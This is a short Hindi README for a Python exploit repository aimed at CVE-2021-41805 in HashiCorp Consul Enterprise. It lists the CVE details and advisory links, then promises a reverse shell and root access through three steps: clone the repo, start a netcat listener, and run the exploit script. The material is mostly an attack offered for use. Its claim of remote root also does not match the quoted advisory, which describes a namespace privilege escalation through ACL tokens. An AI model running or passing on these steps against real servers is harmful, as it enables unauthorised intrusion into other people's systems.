
पायथन के साथ HashiCorp Consul exploit। (CVE-2021-41805)
HashiCorp Consul Enterprise 1.8.17 से पहले, 1.9.x 1.9.11 से पहले, और 1.10.x 1.10.4 से पहले में अनुचित एक्सेस नियंत्रण है। एक ACL टोकन (डिफ़ॉल्ट operator:write अनुमतियों के साथ) एक नेमस्पेस में दूसरे नेमस्पेस में अनपेक्षित विशेषाधिकार वृद्धि के लिए उपयोग किया जा सकता है।
CVE_ID : CVE-2021-41805
आधार स्कोर : 8.8
गंभीरता : उच्च
जारी तिथि : 2021-12-12
प्रभावित संस्करण : HashiCorp Consul Enterprise 1.8.17 से पहले, 1.9.x 1.9.11 से पहले, और 1.10.x 1.10.4 से पहले
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
एक रिवर्स शेल प्राप्त करें, और रूट एक्सेस प्राप्त करें।
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
फिर लिसनर शुरू करें:
sudo nc -lvnp <port>
फिर एक्सप्लॉइट चलाएं:
python3 CVE-2021-41805.py